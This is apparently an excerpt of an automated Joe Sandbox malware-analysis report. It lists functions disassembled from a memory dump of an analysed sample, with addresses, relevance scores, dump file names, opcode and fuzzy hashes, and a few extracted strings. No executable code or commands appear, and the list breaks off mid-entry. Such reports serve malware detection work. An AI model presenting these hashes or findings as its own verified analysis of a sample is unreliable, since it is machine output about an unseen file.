                                  • Opcode ID: a22aa1c2be853986f7f86311f3837e633fb9bcf58cea3b37c8fff9e1aefd8df0
                                  • Instruction ID: 8981ef7ea35f69ff388f5a44fd10dc129728d9a8bef65c3aaccd2255e8f1a6d3
                                  • Opcode Fuzzy Hash: a22aa1c2be853986f7f86311f3837e633fb9bcf58cea3b37c8fff9e1aefd8df0
                                  • Instruction Fuzzy Hash: ECB207F3A0C2009FE3046E2DEC8567AFBE9EF94720F1A493DE6C4C7744EA3558458696
                                  Function 00B0482E Relevance: 4.0, Strings: 2, Instructions: 1536COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: I9*$z&}
                                  • API String ID: 0-1179308910
                                  • Opcode ID: b569fdfd2db154e8c1072a7c73dd682a19a8b2bdee017d9b4d76ffbe1ebbd663
                                  • Instruction ID: 05d85b933fcf6c5137de17b40a4ff930a50f2d8831af603ca154bb683b816e63
                                  • Opcode Fuzzy Hash: b569fdfd2db154e8c1072a7c73dd682a19a8b2bdee017d9b4d76ffbe1ebbd663
                                  • Instruction Fuzzy Hash: 1DB206F360C2049FE704AE2DEC4567ABBE9EF94720F1A892DE6C4C3744EA3558418797
                                  Function 00724BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?$__ZN
                                  • API String ID: 0-1427190319
                                  • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction ID: b70d6066a6bc1b5f39172a81a2a1b7e49b3cb5118e1a0c3b05509c10c16650d3
                                  • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction Fuzzy Hash: 64724572A08B709BD714CF24D88066AB7E2FFC5310F598A1DF9959B291D378DC41DB82
                                  Function 00B0CF0E Relevance: 2.8, Strings: 1, Instructions: 1598COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: |\f
                                  • API String ID: 0-3295364727
                                  • Opcode ID: 001ae0a81d7bc1477871179130f4ee6e296647716887c5be5a5a828e0b892376
                                  • Instruction ID: b7acb6d853d01f3e1bfe3a2241e11aba32dfd03e880df8f35d203da3ff5b861e
                                  • Opcode Fuzzy Hash: 001ae0a81d7bc1477871179130f4ee6e296647716887c5be5a5a828e0b892376
                                  • Instruction Fuzzy Hash: B9B22AF3A0C6009FE3086E2DEC9567ABBD5EF94720F1A453DEAC5D3740EA3598018697
                                  Function 00705DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: xn--
                                  • API String ID: 0-2826155999
                                  • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction ID: 9de7e829130585237c359cc857b4e7e1c8bfa8f5fe5967c93309ba3e7b1fdaf3
                                  • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction Fuzzy Hash: A2A210B1D00268CAEF18CB68C8A43EDB7F1AF55300F1883AAD5567B2C1D77D9A91CB51
                                  Function 00704DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction ID: 6e31e7eafb142b8d3b8a6ae85b4de2f4b89f76cfbb010b6a7e050e76d266d2c2
                                  • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction Fuzzy Hash: 4AE1DF71608345DFC724DF28C8807AFB7E2EF89300F594A2DE5D99B291D735A855CB82
                                  Function 00704868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction ID: a52b523b693546ff10630154791d364c7007607be7ee8f6217cd74c2a3fa57c7
                                  • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction Fuzzy Hash: EBE1C6B1A08301DFDB24DE18C8817AEB7E6EFC5310F558A2DE68997291E734EC45CB46
                                  Function 0071E258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: UNC\
                                  • API String ID: 0-505053535
                                  • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction ID: f0e9181ebba71fae65fcdf99d8fb5cd54c98b5a62e8ecde6abe3c476ea8cfd9b
                                  • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction Fuzzy Hash: E2E12B71D042658EEB10CF1DC8843FEBBE2AB85314F598169DCA46B2D2D77D8D86CB90
                                  Function 00B37CA8 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 5vs]
                                  • API String ID: 0-2802172945
                                  • Opcode ID: 770e1d2abe625ad4280f6d41fc1c7438ba1cd8cb4e0271093ab8c75a7dad9eb5
                                  • Instruction ID: 1497fdd2cf16af5928c479f034713513e6ad46eb815839ce331bd48e4b67f9ce
                                  • Opcode Fuzzy Hash: 770e1d2abe625ad4280f6d41fc1c7438ba1cd8cb4e0271093ab8c75a7dad9eb5
                                  • Instruction Fuzzy Hash: B451C0F324C510DBE3105A29DCC467AB7EAEFC4320F3586BDA5C6D7704E93498429692
                                  Function 006DE544 Relevance: .8, Instructions: 823COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                  • Instruction ID: 2126e56d1bb7b52b7a72dbf1a7a9f04e9a8468d0bb5039ab3c79dadba2a02d18
                                  • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                  • Instruction Fuzzy Hash: BF82E175900F448FD765CF29C880B92B7E2BF5A300F548A2ED9EA8B751DB31B545CB50
                                  Function 006F8E78 Relevance: .6, Instructions: 649COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                  • Instruction ID: 00efdcd9e0550f614a11d4d21f5f91dfaa6f30f7a8fdceb3964b9e4b43f4471a
                                  • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                  • Instruction Fuzzy Hash: 7242C4716047498FD729CF19C0907B5FBE3BF95314F288AAEC6868B791C635E885CB60
                                  Function 0072AC28 Relevance: .5, Instructions: 501COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                  • Instruction ID: ce7ea2f10c367ef55aaa57025143246173c663252ea9e6b629f6a0b7553fa729
                                  • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                  • Instruction Fuzzy Hash: D902F671E003268FDB11CF29D8916BFB7E2AF9A340F16831AE815B7251D774AD8287D0
                                  Function 007098B8 Relevance: .5, Instructions: 482COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
